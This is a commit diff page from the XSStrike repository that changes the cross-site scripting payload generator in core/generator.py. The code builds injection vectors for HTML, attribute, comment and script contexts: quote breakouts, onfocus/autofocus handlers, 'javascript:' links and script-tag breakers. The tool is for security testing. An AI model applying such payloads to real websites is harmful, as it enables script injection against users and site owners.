s0md3v/XSStrike
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

adapt to API changes, support for more contexts

Browse Source
This commit is contained in:
Somdev Sangwan
2019-04-19 07:56:17 +05:30
committed by GitHub
parent a72d023ddb
commit 3b3b23a86c
1 changed files with 58 additions and 69 deletions
Download Patch File Download Diff File Expand all files Collapse all files

127
core/generator.py
View File

@@ -9,105 +9,94 @@ def generator(occurences, response):
vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(), vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()} 6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
for i in occurences: for i in occurences:
context = occurences[i]['context'][0] context = occurences[i]['context']
breaker = occurences[i]['context'][1]
special = occurences[i]['context'][2]
try:
attributeName = list(occurences[i]['context'][3].keys())[0]
attributeValue = list(occurences[i]['context'][3].values())[0]
except AttributeError:
attributeName = occurences[i]['context'][3]
if special not in badTags:
special = ''
elif context == 'attribute':
special = '</' + special + '/>'
else:
special = ''
if context == 'html': if context == 'html':
lessBracketEfficiency = occurences[i]['score']['<'] lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>'] greatBracketEfficiency = occurences[i]['score']['>']
breakerEfficiency = occurences[i]['score'][breaker]
if breaker == '\'' or breaker == '"':
breaker = ''
breakerEfficiency = 100
ends = ['//'] ends = ['//']
badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
if greatBracketEfficiency == 100: if greatBracketEfficiency == 100:
ends.append('>') ends.append('>')
if lessBracketEfficiency == breakerEfficiency == 100: if lessBracketEfficiency:
payloads = genGen(fillings, eFillings, lFillings, payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, breaker, special) eventHandlers, tags, functions, ends, badTag)
for payload in payloads: for payload in payloads:
vectors[10].add(payload) vectors[10].add(payload)
elif context == 'attribute': elif context == 'attribute':
found = False found = False
breakerEfficiency = occurences[i]['score'][breaker] quote = occurences[i]['details']['quote']
Type = occurences[i]['details']['type']
attributeName = occurences[i]['details']['name']
attributeValue = occurences[i]['details']['value']
quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100
greatBracketEfficiency = occurences[i]['score']['>'] greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//'] ends = ['//']
if greatBracketEfficiency == 100: if greatBracketEfficiency == 100:
ends.append('>') ends.append('>')
if greatBracketEfficiency == 100 and breakerEfficiency == 100: if greatBracketEfficiency == 100 and quoteEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings, payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, breaker, special) eventHandlers, tags, functions, ends)
for payload in payloads: for payload in payloads:
if breaker: payload = quote + '>' + payload
payload = payload.replace(breaker, breaker + '>')
else:
payload = '>' + payload
found = True found = True
vectors[6].add(payload) vectors[9].add(payload)
if breakerEfficiency == 100: if quoteEfficiency == 100:
for filling in fillings: for filling in fillings:
for function in functions: for function in functions:
vector = breaker + filling + 'auTOfOcuS' + \ vector = quote + filling + r('autofocus') + \
filling + 'OnFoCUs' + '=' + breaker + function filling + r('onfocus') + '=' + quote + function
found = True found = True
vectors[6].add(vector) vectors[8].add(vector)
if breakerEfficiency == 90: if quoteEfficiency == 90:
for filling in fillings: for filling in fillings:
for function in functions: for function in functions:
vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + \ vector = '\\' + quote + filling + r('autofocus') + filling + \
'OnFoCUs' + '=' + function + filling + '\\' + breaker r('onfocus') + '=' + function + filling + '\\' + quote
found = True found = True
vectors[6].add(vector) vectors[7].add(vector)
if attributeName == 'srcdoc': if Type == 'value':
if occurences[i]['score']['&lt;']: if attributeName == 'srcdoc':
if occurences[i]['score']['&gt;']: if occurences[i]['score']['&lt;']:
del ends[:] if occurences[i]['score']['&gt;']:
ends.append('%26gt;') del ends[:]
payloads = genGen( ends.append('%26gt;')
fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, '', '') payloads = genGen(
for payload in payloads: fillings, eFillings, lFillings, eventHandlers, tags, functions, ends)
for payload in payloads:
found = True
vectors[9].add(payload.replace('<', '%26lt;'))
elif attributeName == 'href' and attributeValue == xsschecker:
for function in functions:
found = True found = True
vectors[9].add(payload.replace('<', '%26lt;')) vectors[10].add(r('javascript:') + function)
if attributeName.startswith('on'): elif attributeName.startswith('on'):
closer = jsContexter(attributeValue) closer = jsContexter(attributeValue)
breaker = '' quote = ''
for char in attributeValue.split(xsschecker)[1]: for char in attributeValue.split(xsschecker)[1]:
if char in ['\'', '"', '`']: if char in ['\'', '"', '`']:
breaker = char quote = char
break break
if closer:
suffix = '//\\' suffix = '//\\'
for filling in jFillings: for filling in jFillings:
for function in functions: for function in functions:
vector = breaker + closer + filling + function + suffix vector = quote + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif breakerEfficiency > 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if breaker == '':
filling = ''
vector = '\\' + breaker + closer + filling + function + suffix
if found: if found:
vectors[7].add(vector) vectors[7].add(vector)
else: else:
vectors[9].add(vector) vectors[9].add(vector)
if quoteEfficiency > 83:
suffix = '//'
for filling in jFillings:
for function in functions:
if '=' in function:
function = '(' + function + ')'
if quote == '':
filling = ''
vector = '\\' + quote + closer + filling + function + suffix
if found:
vectors[7].add(vector)
else:
vectors[9].add(vector)
elif context == 'comment': elif context == 'comment':
lessBracketEfficiency = occurences[i]['score']['<'] lessBracketEfficiency = occurences[i]['score']['<']
@@ -118,7 +107,7 @@ def generator(occurences, response):
ends.append('>') ends.append('>')
if lessBracketEfficiency == breakerEfficiency == 100: if lessBracketEfficiency == breakerEfficiency == 100:
payloads = genGen(fillings, eFillings, lFillings, payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, breaker, special) eventHandlers, tags, functions, ends)
for payload in payloads: for payload in payloads:
vectors[10].add(payload) vectors[10].add(payload)
elif context == 'script': elif context == 'script':
@@ -139,7 +128,7 @@ def generator(occurences, response):
if scriptEfficiency == 100: if scriptEfficiency == 100:
breaker = r('</script/>') breaker = r('</script/>')
payloads = genGen(fillings, eFillings, lFillings, payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, breaker, special) eventHandlers, tags, functions, ends)
for payload in payloads: for payload in payloads:
vectors[10].add(payload) vectors[10].add(payload)
if closer: if closer: